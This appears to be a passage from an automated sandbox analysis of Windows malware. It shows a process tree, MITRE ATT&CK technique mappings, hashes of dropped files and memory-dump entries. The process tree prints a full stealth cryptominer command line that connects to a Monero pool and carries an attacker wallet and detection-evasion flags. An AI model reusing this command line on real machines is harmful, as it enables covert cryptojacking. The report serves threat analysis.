        Suspicious use of AdjustPrivilegeToken
        
        PID:2116
        
        C:\Windows\system32\Microsoft\Libs\sihost64.exe
        
        "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
        8⤵
        Executes dropped EXE
        
        PID:5064
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost64"
        9⤵
        
        PID:3588
        
        C:\Windows\System32\conhost.exe
        
        C:\Windows/System32\conhost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14444 --user=41zSmpNwAfHBxUh8HTq7Fsj2TXsGboB8GFeM8ek7xhc8QmL1TJCmoam94f57niQhKqiajN7KMWmAng1cNnMghXPi5bN3xNk.{COMPUTERNAME}/adwadw --pass= --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56GQTOYuXRCBeyb5NYlmdCuiwuvmEFRE3FUoytGa2xDRKVyTGVqBRZ3YvrseaWnYy0OhLuczKVxfo8Wo33kvDh26CIpmy6+bf50YCXxhpkDvay12RqWFwTrEWzJDjMOFSbV4qSudJZDKeejGmt2wAsK4zZ9lj0F0NMeagNs9oiluuddfhHuwfN3JDOsm7vnmpSFDvtwzZIXsZWyWN624JxJsSIqBQxfKrcCnHvRx/k2yLSlvxLvum+3cwztr7Zb0wO7EEWrafJMkNolCTGr1RQK9klv+u1q+LOMUOW+Y1mA+ZjeC+aSi9qmt59ZMlAX42foDzL1w8qyVjl6rfhEF/2bTP0YCyKockkTlSVngGY/1F1T5EOo9DhmrxyNy9y8mJqRKYUIcpgNI5Y4F/BBh3W0pw0+6w6pKB/o2s/ADQ0m7f1mIWwiXrj/GHg6M2kw4tg4mnBGVnha642JDqV8iaYphm4FpsNVwyEeLSXd18Mjr+kd9fvE08ohpB15bbg+6JPSeWISk8CHiep3TzEvyvZ+5XcHZVh1iXXZwlYO+wW5wxnobnzBzuj6f/BZ2txWK+7m4Cgd8mjMym7jJ/vKH1WIDSz05jpx4+wkdqzn3YIdvl2S8Luc4rG0CJXqJOdwbYOBrAey4VzJk8E8cY9tmMr5hpjLcfmu59CVDYVbbFFkb9usjHhXda167RDDOeCiLgdiepY0+9J4GWfDFBWRnvZEIn9njCW10s1hFXvQH+unnKdsaoBPNxSaPInK8O97Hj64jPqNG5qPd3DSjbVR1Cvuh9P29ZftnsNS50GnGtYvaNRBa6443D9MamN7WKSEjXwi5X466GHpLm7tClAm3T8zHW8BSKHq3yutkuduzGC2BYW5rxa17LYp4CzfKufpZJNPcoGIEVeut/xrvPPi+IYNCKrJPaDMN2ZJkpVGMqbuc5AF89xn8L6Lg1pYhaW8QjVZfQAkz7FVC8K667Gg6noLQpAyfd6lW36v4zbzg+fy82rNQmYSI3WMfiYNmvJM8DVc0772kBqEwUisr6ktdw4QlqXJe45Hvgu4yC2Rb6/ntnmOTLJz66c2h/wdUSvS18C67j6jsTvSh7k7avmCdG4sgS/BcyNsYOGIVjgNICoikSjNVrnFxCscaJerBnNPv197mrO4+rRF20+jzVnXKaNAmzbmoa4UjU13WSWasSDIT/lwH5kWp3uPfR1kinOL+sIQ==" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1080

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

Filesize
539B

MD5
b245679121623b152bea5562c173ba11

SHA1
47cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d

SHA256
73d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f

SHA512
75e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
27da5905033077d8435d72bccc869516

SHA1
4d7c7d1d53c4c26cca45c675259331524abdac41

SHA256
3c1e9187b93e299479a2009de16416d125b309e08da7e5ceff4d0409dcca0540

SHA512
ddc4adc2957ee300528d67cd51da0816aac1673ab75075e240799ba36c50cf7921bd7667cd529f0a6602cde54a831bd2ed1aefa7c7158131311f2870fb9ed1b5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9b80cd7a712469a4c45fec564313d9eb

SHA1
6125c01bc10d204ca36ad1110afe714678655f2d

SHA256
5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d

SHA512
ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
c632514bcb6b425c8a7cf90d742507e0

SHA1
a4353fe5fbc3fd411d194f05ab435ecdc0ba9b64

SHA256
4029f3b8df4530e4e1bab7f740668da62ff42fcf8000854e3a916604a4e4e115

SHA512
89d68a9461a16e82bf2a156ab6a9c51af7e2812f342a5e07e8d7f1b2a64c1f9cd023853a428ffd4711f90fede3f388eb51bafb260ed0ec7010f3f77ef66d00f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
7d9ecfe610b58440e18d2bffe5167d71

SHA1
7afeed064042ef5e614228f678a0c595699c3d84

SHA256
2c42082be2718281fe2a2bf0136bf417ff214ce7c36bc22a40d23adb1d026632

SHA512
017a63c4b81cd256adec796b9258fbae464d32af59cb654a81dd157e02896f50a252c25b6eac07fc6cb44a493b477e7debfaf9999c854dbd3fb34e24ef443c29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
67e8893616f805af2411e2f4a1411b2a

SHA1
39bf1e1a0ddf46ce7c136972120f512d92827dcd

SHA256
ca0dfe104c1bf27f7e01999fcdabc16c6400c3da937c832c26bdbca322381d31

SHA512
164e911a9935e75c8be1a6ec3d31199a16ba2a1064da6c09d771b2a38dd7fddd142301ef55d67d90f306d3a454a1ce7b72e129ea42e44500b9b8c623a8d98b4d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9c740b7699e2363ac4ecdf496520ca35

SHA1
aa8691a8c56500d82c5fc8c35209bc6fe50ab1d9

SHA256
be96c91b62ba9ba7072ab89e66543328c9e4395150f9dbe8067332d94a3ecc61

SHA512
8885683f96353582eb871209e766e7eba1a72a2837ce27ea298b7b5b169621d1fa3fce25346b6bfd258b52642644234da9559d4e765a2023a5a5fc1f544cc7af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
0e76a49b7edfe16e8363271648fe5d1c

SHA1
e70eb9a330cd0bd77ea1f5e975c0007206e3eddf

SHA256
a62cdf5dac764759882e7d6c2b9f87cd79d15452115486ef6dfeb65dc408cfa1

SHA512
89cdfcaf386789dfd540d7bfddb0dfa77cc876297aa94425d3c45bc8e0454f0def5bed903147275291f9a7f609758e1e157beba45f023ea65c5869f63a7c84d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\84d8043e-3701-4cd3-aaf7-74eac22b6538\AgileDotNetRT64.dll

Filesize
3.1MB

MD5
4d8082b3de02f82db9a515e9dab5d2b6

SHA1
057a20ade70244601d0fe50f7011c95bae335ea5

SHA256
936b1537b6efcece032c05661238b06beefc61ff76e82b7c5d9fe558a9360a4c

SHA512
7b9153e9948e0f911fcb0b145678a56cac4abd948fa99e07c331760f02dce096cf3be7d2d8493cf7a76460c7172e24eaa45c1283a28353501b2876c54752c60d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Console.exe

Filesize
2.3MB

MD5
95287d0fce14802e21fa489e21be9863

SHA1
f8eb3feb3d8850e3877dc481a8b0c20e9f0d8724

SHA256
249bfd0a939f35cb04fb8a572c3b453830c45b274efe41735a5ee5b35c844b1d

SHA512
2a8a7d83fb8f9b99e51173f5923760286e8b76f911cf62d0517aa459ead7ceedaa510d66a82a203da9b9b0e927f7a3f8eb93580f863e47a0f996c7d9d08b449a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Java.exe

Filesize
2.1MB

MD5
960960ae22a975b17e7ffa714f24020a

SHA1
22c17a81e8ab3d5eab32e0e3cbf4f10883982892

SHA256
31c3fdc6eff26574cea919a4e3f17aeb7d3b6fe6214bd15532bf03c1d04e3298

SHA512
30f7c544fc4dc6a2e8792346f7c9a936c0b9a0d217f356ee86bc062f89bd163575ee905886afa40ab6e2aa30705c06e433bd193d8bdd4e387b0e867c0bbb6511

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z3ssdgbh.k5r.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\launcher.exe

Filesize
6.1MB

MD5
07f81c14f5b70e91fe66c75d5d0c24fb

SHA1
70ceea877ab27db62234129acd5eeddca9518d8a

SHA256
3e6267037189ed897dc92f49c4da6624ad1ee5e3967d3f3075411eee75a29674

SHA512
37105fd000bad88c0208ab43390dcc687546480bcebfd6454656007c9e715b88acf8e0842834423b4b0456c5d588e94a849730ddbddaf7bd68e0a53010ea9a19

Download Submit
C:\Windows\RuntimeBroker.exe

Filesize
404KB

MD5
595e541cc53c1b909e395c2ebb3032b4

SHA1
3e61bb6b58b66c3dfce9b4ca74dfc38fb76c7d5b

SHA256
bcabe497dad3783de483b65e39107f3d169be4b687335b830f81b629f41c588f

SHA512
d273e73d974ff8dabb84426c794f46d42abeb5b8a5f32aeec9478163c29a12122352cbfd763f9b671d7f2d3ac0f1286eda1f31478a46f6e73cfe28b24fc7c793

Download Submit
C:\Windows\System32\Microsoft\Libs\sihost64.exe

Filesize
78KB

MD5
3a50e9d8b7ce768f0657ab18b4550b0b

SHA1
cbab3928f2f3f39259156899847deaba16fef8b1

SHA256
1ac2515f2992566071cdb2182958c7f345681a303284dfe8721d4309e398c12a

SHA512
25fca998556b769d4f55cb473c13248179f297131d74d71be43676b2e2de50897ab3624ac7049b57928a7e0d159c8dd4b5742ce350a470e46d6288cc7ca65813

Download Submit
C:\Windows\System32\Microsoft\Telemetry\sihost32.exe

Filesize
79KB

MD5
4ce9626c05b0420611f3c13cdffb932a

SHA1
0b9b5d15830e6fe4709ec182ee4bb9f047375db9

SHA256
d556bc8076ec3ed9175d9bc3d34e0cc2937f90082a71ecb726721d81050a51c8

SHA512
f9c878ebef4b42310ed4a60b8d7bb9148d05ef89ed7d59eec38804d3d1b4c5f4a750ad4af82fc4db1819c96092cd2cbe37e90b83783b616b8953d382065592e1

Download Submit
memory/624-33-0x00007FFB17FD0000-0x00007FFB1883C000-memory.dmp

Filesize
8.4MB

Download
memory/624-34-0x00007FFB17FD0000-0x00007FFB1883C000-memory.dmp

Filesize
8.4MB

Download
memory/624-35-0x00007FFB194C0000-0x00007FFB1960E000-memory.dmp

Filesize
1.3MB

Download
memory/624-110-0x00007FFB17FD0000-0x00007FFB1883C000-memory.dmp

Filesize
8.4MB

Download
memory/624-26-0x000001BF98930000-0x000001BF98F4A000-memory.dmp

Filesize
6.1MB

Download
memory/624-142-0x00007FFB17FD0000-0x00007FFB1883C000-memory.dmp

Filesize
8.4MB

Download
memory/1080-229-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1080-257-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1080-231-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1080-228-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1080-221-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1080-265-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1080-230-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1080-227-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1080-226-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1080-223-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1080-224-0x00000200AC900000-0x00000200AC920000-memory.dmp

Filesize
128KB

Download
memory/1080-258-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1708-9-0x0000000000EDF000-0x00000000011A3000-memory.dmp

Filesize
2.8MB

Download
memory/1708-7-0x0000000000400000-0x0000000002107000-memory.dmp

Filesize
29.0MB

Download
memory/1708-10-0x0000000000400000-0x0000000002107000-memory.dmp

Filesize
29.0MB

Download
memory/1708-0-0x0000000000EDF000-0x00000000011A3000-memory.dmp

Filesize
2.8MB

Download
memory/1708-113-0x0000000000400000-0x0000000002107000-memory.dmp

Filesize
29.0MB

Download
memory/1708-2-0x0000000000400000-0x0000000002107000-memory.dmp

Filesize
29.0MB

Download
memory/1708-1-0x0000000003E70000-0x0000000003E71000-memory.dmp

Filesize
4KB

Download
memory/3080-259-0x00000233533D0000-0x00000233533E2000-memory.dmp

Filesize
72KB

Download
memory/3080-260-0x0000023354EF0000-0x0000023354F04000-memory.dmp

Filesize
80KB

Download
memory/3080-261-0x0000023354F90000-0x0000023354F96000-memory.dmp

Filesize
24KB

Download
memory/3128-115-0x0000020729EE0000-0x000002072A121000-memory.dmp

Filesize
2.3MB

Download
memory/3128-117-0x0000020744AE0000-0x0000020744D22000-memory.dmp

Filesize
2.3MB

Download
memory/3128-120-0x00000207448A0000-0x0000020744ACA000-memory.dmp

Filesize
2.2MB

Download
memory/3252-74-0x0000000007420000-0x00000000074C3000-memory.dmp

Filesize
652KB

Download
memory/3252-73-0x00000000067B0000-0x00000000067CE000-memory.dmp

Filesize
120KB

Download
memory/3252-75-0x00000000075B0000-0x00000000075BA000-memory.dmp

Filesize
40KB

Download
memory/3252-78-0x00000000077B0000-0x0000000007846000-memory.dmp

Filesize
600KB

Download
memory/3252-50-0x0000000005C00000-0x0000000005F54000-memory.dmp

Filesize
3.3MB

Download
memory/3252-61-0x00000000067F0000-0x0000000006822000-memory.dmp

Filesize
200KB

Download
memory/3252-79-0x0000000007730000-0x0000000007741000-memory.dmp

Filesize
68KB

Download
memory/3252-38-0x0000000005B90000-0x0000000005BF6000-memory.dmp

Filesize
408KB

Download
memory/3252-63-0x0000000070C70000-0x0000000070CBC000-memory.dmp

Filesize
304KB

Download
memory/3252-37-0x0000000005B20000-0x0000000005B86000-memory.dmp

Filesize
408KB

Download
memory/3252-36-0x0000000005980000-0x00000000059A2000-memory.dmp

Filesize
136KB

Download
memory/3252-83-0x0000000007850000-0x0000000007858000-memory.dmp

Filesize
32KB

Download
memory/3252-82-0x0000000007870000-0x000000000788A000-memory.dmp

Filesize
104KB

Download
memory/3252-81-0x0000000007780000-0x0000000007794000-memory.dmp

Filesize
80KB

Download
memory/3252-80-0x0000000007770000-0x000000000777E000-memory.dmp

Filesize
56KB

Download
memory/3452-114-0x0000024C01750000-0x0000024C01962000-memory.dmp

Filesize
2.1MB

Download
memory/3452-116-0x0000024C1C200000-0x0000024C1C412000-memory.dmp

Filesize
2.1MB

Download
memory/3452-118-0x0000024C1BFE0000-0x0000024C1C1DA000-memory.dmp

Filesize
2.0MB

Download
memory/3452-119-0x0000024C037E0000-0x0000024C037F2000-memory.dmp

Filesize
72KB

Download
memory/3588-263-0x000001CC3C8B0000-0x000001CC3C8C4000-memory.dmp

Filesize
80KB

Download
memory/3588-264-0x000001CC3C950000-0x000001CC3C956000-memory.dmp

Filesize
24KB

Download
memory/3588-262-0x000001CC3AD90000-0x000001CC3ADA2000-memory.dmp

Filesize
72KB

Download
memory/4052-130-0x0000024DACAB0000-0x0000024DACAD2000-memory.dmp

Filesize
136KB

Download
memory/4272-99-0x0000000070C70000-0x0000000070CBC000-memory.dmp

Filesize
304KB

Download
memory/4272-109-0x0000000007BA0000-0x0000000007BB1000-memory.dmp

Filesize
68KB

Download
memory/4272-111-0x0000000007BE0000-0x0000000007BF4000-memory.dmp

Filesize
80KB

Download
memory/4776-77-0x0000000007C40000-0x0000000007CD2000-memory.dmp

Filesize
584KB

Download
memory/4776-58-0x0000000006870000-0x000000000688E000-memory.dmp

Filesize
120KB

Download
memory/4776-59-0x0000000006900000-0x000000000694C000-memory.dmp

Filesize
304KB

Download
memory/4776-60-0x0000000007EE0000-0x000000000855A000-memory.dmp

Filesize
6.5MB

Download
memory/4776-62-0x0000000006D80000-0x0000000006D9A000-memory.dmp

Filesize
104KB

Download
memory/4776-76-0x0000000008B10000-0x00000000090B4000-memory.dmp

Filesize
5.6MB

Download
memory/4776-24-0x0000000003290000-0x00000000032C6000-memory.dmp

Filesize
216KB

Download
memory/4776-25-0x00000000059B0000-0x0000000005FD8000-memory.dmp

Filesize
6.2MB

Download